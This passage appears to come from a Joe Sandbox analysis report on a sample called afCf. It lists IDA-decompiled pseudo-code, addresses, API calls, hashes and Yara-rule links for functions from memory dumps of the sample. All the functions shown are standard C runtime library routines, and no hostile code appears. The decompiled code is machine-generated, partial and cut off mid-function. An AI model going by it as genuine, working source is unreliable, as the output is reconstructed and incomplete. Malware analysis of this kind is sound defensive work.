										if(_t120 >= _t113) {
											_t131 = _t113;
										}
										__eflags = _t131 - _v8;
										if(_t131 > _v8) {
											_t133 = 0;
											__eflags = _a8 - 0xffffffff;
											if(__eflags != 0) {
												E0040BA30(_t131, _a4, 0, _a8);
												_t134 = _t134 + 0xc;
											}
											_t114 = E0040BFC1(__eflags);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											_push(_t133);
											 *_t114 = 0x22;
											_push(_t133);
											goto L4;
										} else {
											E004103F1(_t120, _t123, _t125, _v12, _v8,  *_t133, _t131);
											 *(_t133 + 4) =  *(_t133 + 4) - _t131;
											 *_t133 =  *_t133 + _t131;
											_v12 = _v12 + _t131;
											_t120 = _t120 - _t131;
											_t134 = _t134 + 0x10;
											_v8 = _v8 - _t131;
											_t131 = _v20;
										}
										L39:
										__eflags = _t120;
									} while (_t120 != 0);
									goto L40;
								}
							}
						}
						_t118 = _t90 | 0xffffffff;
						_t90 = _t118 / _a12;
						_t125 = _t118 % _a12;
						__eflags = _a16 - _t90;
						if(_a16 <= _t90) {
							goto L13;
						}
						goto L9;
					}
					L3:
					_t92 = E0040BFC1(_t138);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					_push(_t131);
					 *_t92 = 0x16;
					_push(_t131);
					goto L4;
				}
			}

0x0040bcc2
0x0040bcca
0x0040bcce
0x0040bcd3
0x0040bcd5
0x0040bcd8
0x0040bcde
0x0040bd01
0x00000000
0x0040bce5
0x0040bce5
0x0040bce7
0x0040bd08
0x0040bd0b
0x0040bd0d
0x0040bd1c
0x0040bd1c
0x0040bd1f
0x0040bd24
0x0040bd29
0x0040bd29
0x0040bd2c
0x0040bd2e
0x00000000
0x0040bd30
0x0040bd30
0x0040bd35
0x0040bd38
0x0040bd3b
0x00000000
0x00000000
0x0040bd3d
0x0040bd40
0x0040bd44
0x0040bd4b
0x0040bd4e
0x0040bd50
0x0040bd5a
0x0040bd52
0x0040bd55
0x0040bd55
0x0040bd61
0x0040bd63
0x0040be53
0x00000000
0x0040bd69
0x0040bd69
0x0040bd69
0x0040bd70
0x0040bdb6
0x0040bdb6
0x0040bdb9
0x0040be24
0x0040be2a
0x0040be2d
0x0040beb8
0x00000000
0x0040bebe
0x0040be33
0x0040be37
0x0040be87
0x0040be87
0x0040be8b
0x0040be95
0x0040be9a
0x0040be9a
0x0040bea2
0x0040beaa
0x0040beab
0x0040beac
0x0040bead
0x0040beae
0x0040bcf9
0x0040bcf9
0x00000000
0x0040bcfe
0x0040be39
0x0040be3c
0x0040be3f
0x0040be44
0x0040be45
0x0040be45
0x0040be45
0x0040be48
0x00000000
0x0040be48
0x0040bdbb
0x0040bdbf
0x0040bde0
0x0040bde5
0x0040bde7
0x0040bde9
0x0040bde9
0x0040bdc1
0x0040bdc8
0x0040bdca
0x0040bdd7
0x0040bdd7
0x0040bdd7
0x0040bdda
0x0040bdcc
0x0040bdce
0x0040bdd1
0x0040bdd1
0x0040bddc
0x0040bddc
0x0040bdeb
0x0040bdee
0x00000000
0x0040bdf4
0x0040bdf4
0x0040bdf5
0x0040bdf9
0x0040bdfe
0x0040bdff
0x0040be00
0x0040be05
0x0040be08
0x0040be0a
0x0040bec6
0x00000000
0x0040bec6
0x0040be10
0x0040be13
0x0040beb4
0x0040beb4
0x0040beb4
0x0040beb4
0x00000000
0x0040beb4
0x0040be19
0x0040be1c
0x0040be1e
0x00000000
0x0040be1e
0x0040bdee
0x0040bd72
0x0040bd75
0x0040bd77
0x00000000
0x00000000
0x0040bd79
0x00000000
0x00000000
0x0040bd7f
0x0040bd81
0x0040bd83
0x0040bd85
0x0040bd85
0x0040bd87
0x0040bd8a
0x0040be5b
0x0040be5d
0x0040be61
0x0040be6a
0x0040be6f
0x0040be6f
0x0040be72
0x0040be77
0x0040be78
0x0040be79
0x0040be7a
0x0040be7b
0x0040be81
0x00000000
0x0040bd90
0x0040bd99
0x0040bd9e
0x0040bda1
0x0040bda3
0x0040bda6
0x0040bda8
0x0040bdab
0x0040bdae
0x0040bdae
0x0040be4b
0x0040be4b
0x0040be4b
0x00000000
0x0040bd69
0x0040bd63
0x0040bd2e
0x0040bd0f
0x0040bd14
0x0040bd14
0x0040bd17
0x0040bd1a
0x00000000
0x00000000
0x00000000
0x0040bd1a
0x0040bce9
0x0040bce9
0x0040bcee
0x0040bcef
0x0040bcf0
0x0040bcf1
0x0040bcf2
0x0040bcf8
0x00000000
0x0040bcf8

APIs

_memset.LIBCMT ref: 0040BD24
_memcpy_s.LIBCMT ref: 0040BD99
__fileno.LIBCMT ref: 0040BDF9
__read.LIBCMT ref: 0040BE00
__filbuf.LIBCMT ref: 0040BE24
_memset.LIBCMT ref: 0040BE6A
_memset.LIBCMT ref: 0040BE95

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Memory Dump Source

Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_afCf.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 0066C9A4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 0066C92F
__fileno.LIBCMT ref: 0066C93D
__fileno.LIBCMT ref: 0066C949
__fileno.LIBCMT ref: 0066C955
__fileno.LIBCMT ref: 0066C965

Part of subcall function 0066C228: __getptd_noexit.LIBCMT ref: 0066C228

Strings

'B, xrefs: 0066C976

Memory Dump Source

Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_660000_afCf.jbxd

Yara matches

Similarity

API ID: __fileno$__getptd_noexit__lock_file
String ID: 'B
API String ID: 3755561058-2787509829
Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction ID: 742fd6cfb660563147d10b182e7c20350988fb5bc2ef8563fceff2fef92f9031
Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction Fuzzy Hash: 27018E33600A1466C3617B786C4347E77A68F86770735431DF0B0DB1D2EF28D902A19D

Uniqueness

Uniqueness Score: -1.00%

Function 0067499F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 006749AB

Part of subcall function 0067099C: __getptd_noexit.LIBCMT ref: 0067099F
Part of subcall function 0067099C: __amsg_exit.LIBCMT ref: 006709AC

__getptd.LIBCMT ref: 006749C2
__amsg_exit.LIBCMT ref: 006749D0
__lock.LIBCMT ref: 006749E0

Strings

@.B, xrefs: 006749ED

Memory Dump Source

Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_660000_afCf.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: @.B
API String ID: 3521780317-470711618
Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction ID: 6fa552dd796b227cb291a89866e90011fba5a55214a3ca05f62e55f5a1a10c6b
Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction Fuzzy Hash: 37F0BB31A40710DBE7A0FB74850A79A73A26F00750F51861DE55CA72D2DF749C01CF9D

Uniqueness

Uniqueness Score: -1.00%

Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x4214d0);
				E0040E1D8(__ebx, __edi, __esi);
				_t28 = E00410735(__ebx, __edx, __edi, _t30);
				_t13 =  *0x422e34; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E0040D6E0(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x422f18; // 0x422e40
					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E004147A2();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E0040E79A(_t25, _t26, 0x20);
				}
				return E0040E21D(_t28);
			}

0x00414738
0x00414738
0x00414738
0x00414738
0x00414738
0x0041473a
0x0041473f
0x00414749
0x0041474b
0x00414753
0x00414777
0x00414779
0x0041477f
0x00414783
0x00414786
0x00414791
0x00414794
0x0041479b
0x00414755
0x00414755
0x00414759
0x00000000
0x0041475b
0x00414760
0x00414760
0x00414759
0x00414765
0x00414769
0x0041476e
0x00414776

APIs

__getptd.LIBCMT ref: 00414744

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__getptd.LIBCMT ref: 0041475B
__amsg_exit.LIBCMT ref: 00414769
__lock.LIBCMT ref: 00414779

Strings

@.B, xrefs: 00414786

Memory Dump Source

Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_afCf.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: @.B
API String ID: 3521780317-470711618
Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 00674961 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

___addlocaleref.LIBCMT ref: 00674973
___removelocaleref.LIBCMT ref: 0067497E
___freetlocinfo.LIBCMT ref: 00674992

Part of subcall function 006746F0: ___free_lconv_mon.LIBCMT ref: 00674736
Part of subcall function 006746F0: ___free_lconv_num.LIBCMT ref: 00674757
Part of subcall function 006746F0: ___free_lc_time.LIBCMT ref: 006747DC

Strings

@.B, xrefs: 00674989
@.B, xrefs: 00674970

Memory Dump Source

Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_660000_afCf.jbxd

Yara matches

Similarity

API ID: ___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
String ID: @.B$@.B
API String ID: 4212647719-183327057
Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
Instruction ID: 0538985d520025aa5a8dd9a265296821b34a51644a1ccaac1783dd8084f0d4d3
Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
Instruction Fuzzy Hash: FCE0DF62511A210D8A312A1C68083EBD3970FC2312B1B926EF90CE7245DF268C8084A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t16;
				void* _t17;
				intOrPtr _t19;
				void* _t21;
				signed int _t22;
				intOrPtr* _t27;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t50;

				_t37 = __edx;
				_push(8);
				_push(0x421140);
				E0040E1D8(__ebx, __edi, __esi);
				_t39 = _a4;
				_t50 = _t39;
				_t51 = _t50 != 0;
				if(_t50 != 0) {
					E0040FB29(_t39);
					_v8 = 0;
					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
					_t16 = E0040FA20(__edx, _t39, _t39);
					__eflags = _t16 - 0xffffffff;
					if(_t16 == 0xffffffff) {
						L6:
						_t17 = 0x4227e0;
					} else {
						_t21 = E0040FA20(__edx, _t39, _t39);
						__eflags = _t21 - 0xfffffffe;
						if(_t21 == 0xfffffffe) {
							goto L6;
						} else {
							_t22 = E0040FA20(__edx, _t39, _t39);
							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
						}
					}
					_t9 = _t17 + 4; // 0xa80
					 *(_t17 + 4) =  *_t9 & 0x000000fd;
					_v8 = 0xfffffffe;
					E0040C735(_t39);
					_t19 = 0;
					__eflags = 0;
				} else {
					_t27 = E0040BFC1(_t51);
					_t40 = 0x16;
					 *_t27 = _t40;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0040E744(__edx, _t40, 0);
					_t19 = _t40;
				}
				return E0040E21D(_t19);
			}

0x0040c73d
0x0040c690
0x0040c692
0x0040c697
0x0040c69e
0x0040c6a3
0x0040c6a8
0x0040c6aa
0x0040c6c8
0x0040c6ce
0x0040c6d1
0x0040c6d6
0x0040c6dc
0x0040c6df
0x0040c70f
0x0040c70f
0x0040c6e1
0x0040c6e2
0x0040c6e8
0x0040c6eb
0x00000000
0x0040c6ed
0x0040c6ee
0x0040c70b
0x0040c70b
0x0040c6eb
0x0040c714
0x0040c71b
0x0040c71e
0x0040c725
0x0040c72a
0x0040c72a
0x0040c6ac
0x0040c6ac
0x0040c6b3
0x0040c6b4
0x0040c6b6
0x0040c6b7
0x0040c6b8
0x0040c6b9
0x0040c6ba
0x0040c6bb
0x0040c6c3
0x0040c6c3
0x0040c731

APIs

__lock_file.LIBCMT ref: 0040C6C8
__fileno.LIBCMT ref: 0040C6D6
__fileno.LIBCMT ref: 0040C6E2
__fileno.LIBCMT ref: 0040C6EE
__fileno.LIBCMT ref: 0040C6FE

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_afCf.jbxd

Yara matches

Similarity

API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
String ID:
API String ID: 2805327698-0
Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D

Uniqueness

Uniqueness Score: -1.00%

Function 00674233 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0067423F

Part of subcall function 0067099C: __getptd_noexit.LIBCMT ref: 0067099F
Part of subcall function 0067099C: __amsg_exit.LIBCMT ref: 006709AC

__amsg_exit.LIBCMT ref: 0067425F
__lock.LIBCMT ref: 0067426F
InterlockedDecrement.KERNEL32(?), ref: 0067428C
InterlockedIncrement.KERNEL32(00422D38), ref: 006742B7

Memory Dump Source

Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_660000_afCf.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction ID: 674366b3bdba27de17c425b9d5e465ba6d7d1e23a8c81386a791e7d6f1ea066d
Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction Fuzzy Hash: 0D010431F01620EBD721AB2498097AEB361AF44710F418119F838A7292DF34AA91CFDA

Uniqueness

Uniqueness Score: -1.00%

Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x421490);
				E0040E1D8(__ebx, __edi, __esi);
				_t31 = E00410735(__ebx, __edx, __edi, _t35);
				_t15 =  *0x422e34; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040D6E0(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x422d38; // 0x721658
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x422910;
								if(__eflags != 0) {
									_push(_t33);
									E0040B6B5(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x422d38; // 0x721658
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x422d38; // 0x721658
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00414067();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0040E79A(_t29, _t31, 0x20);
				}
				return E0040E21D(_t33);
			}

0x00413fcc
0x00413fcc
0x00413fcc
0x00413fcc
0x00413fce
0x00413fd3
0x00413fdd
0x00413fdf
0x00413fe7
0x00414008
0x0041400e
0x00414012
0x00414015
0x00414018
0x0041401e
0x00414020
0x00414022
0x00414025
0x0041402b
0x0041402d
0x0041402f
0x00414035
0x00414037
0x00414038
0x0041403d
0x00414035
0x0041402d
0x0041403e
0x00414043
0x00414046
0x0041404c
0x00414050
0x00414050
0x00414056
0x0041405d
0x00413fef
0x00413fef
0x00413fef
0x00413ff4
0x00413ff8
0x00413ffd
0x00414005

APIs

__getptd.LIBCMT ref: 00413FD8

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__amsg_exit.LIBCMT ref: 00413FF8
__lock.LIBCMT ref: 00414008
InterlockedDecrement.KERNEL32(?), ref: 00414025
InterlockedIncrement.KERNEL32(00721658), ref: 00414050

Memory Dump Source

Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_afCf.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 0066FCBF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 0066FCE1
__calloc_crt.LIBCMT ref: 0066FCFA

Strings

`$B, xrefs: 0066FD33
P$B, xrefs: 0066FD11

Memory Dump Source

Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_660000_afCf.jbxd

Yara matches

Similarity

API ID: __calloc_crt
String ID: P$B$`$B
API String ID: 3494438863-235554963
Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
Instruction ID: 8407a78dc349977ac2c255be402d25180c4672cb75ab73469da165bf789e08b0
Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
Instruction Fuzzy Hash: FD11C6323486155BE724CF2DBC50BA53397EF85724B64463BE615CB3A4E774E883468C

Uniqueness

Uniqueness Score: -1.00%

Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E00413610() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x41fb50;
					_v28 =  *0x41fb48;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x00413615
0x0041361d
0x00413634
0x004135e0
0x004135e9
0x004135f5
0x004135f8
0x004135fb
0x004135fd
0x00413600
0x00413605
0x0041360f
0x00413607
0x0041360b
0x0041360b
0x0041361f
0x00413625
0x0041362d
0x00000000
0x0041362f
0x0041362f
0x00413633
0x00413633
0x0041362d

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625

Strings

IsProcessorFeaturePresent, xrefs: 0041361F
KERNEL32, xrefs: 00413610

Memory Dump Source

Source File: 00000002.00000002.287575754.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.287575754.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.287575754.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_afCf.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A

Uniqueness

Uniqueness Score: -1.00%

Function 00661B57 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 00661B6D
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 00661B96
GetLastError.KERNEL32 ref: 00661BA7
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00661BBF
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00661BE7

Memory Dump Source

Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_660000_afCf.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 8f70809d158e9c710dcb84151ce5da240c1ca2c4bbdb37938bf874ac0ee929c6
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 0A11C4351003647BD3309755DC88F677F6CEBC7BA9F048518FD559E281DA21AC04C6B8

Uniqueness

Uniqueness Score: -1.00%

Function 0066C9AF Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE

Download Yara Rule

APIs

__fileno.LIBCMT ref: 0066C9E3
__locking.LIBCMT ref: 0066C9F8

Part of subcall function 0066C228: __getptd_noexit.LIBCMT ref: 0066C228

Memory Dump Source

Source File: 00000002.00000002.287974900.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_660000_afCf.jbxd

Yara matches

Similarity

API ID: __fileno__getptd_noexit__locking
String ID:
API String ID: 630670418-0
Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction ID: 5befd7fe26f3e36482bc0343039d9cb618836bb1a614acbba8aa2c9e8a88d566
Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction Fuzzy Hash: 2F51B771E00A49AFDB10CFA8C9817B9BBB2EF05364F14C269D99597385D730EE41DB84

Uniqueness

Uniqueness Score: -1.00%

Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0040C748(void* __edx, void* __esi, char _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				intOrPtr _t73;
				signed int _t75;
				signed int _t81;
				char _t82;
				signed int _t84;
				intOrPtr* _t86;
				signed int _t87;
				intOrPtr* _t90;
				signed int _t92;
				signed int _t94;
				void* _t96;
				signed char _t98;
				signed int _t99;
				intOrPtr _t102;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t111;
				signed int _t114;
				intOrPtr _t115;

				_t105 = __esi;
				_t97 = __edx;
				_t104 = _a4;
				_t87 = 0;
				_t121 = _t104;
				if(_t104 != 0) {
					_t70 = E0040FA20(__edx, _t104, _t104);
					__eflags =  *(_t104 + 4);
					_v8 = _t70;
					if(__eflags < 0) {
						 *(_t104 + 4) = 0;
					}
					_push(1);
					_push(_t87);
					_push(_t70);
					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
					__eflags = _t71 - _t87;
					_v12 = _t71;
					if(_t71 < _t87) {
						L2:
						return _t71 | 0xffffffff;
					} else {
						_t98 =  *(_t104 + 0xc);
						__eflags = _t98 & 0x00000108;
						if((_t98 & 0x00000108) != 0) {
							_t73 =  *_t104;
							_t92 =  *(_t104 + 8);
							_push(_t105);
							_v16 = _t73 - _t92;
							__eflags = _t98 & 0x00000003;
							if((_t98 & 0x00000003) == 0) {
								__eflags = _t98;
								if(__eflags < 0) {
									L15:
									__eflags = _v12 - _t87;
									if(_v12 != _t87) {
										__eflags =  *(_t104 + 0xc) & 0x00000001;
										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
											L40:
											_t75 = _v16 + _v12;
											__eflags = _t75;
											L41:
											return _t75;
										}
										_t99 =  *(_t104 + 4);
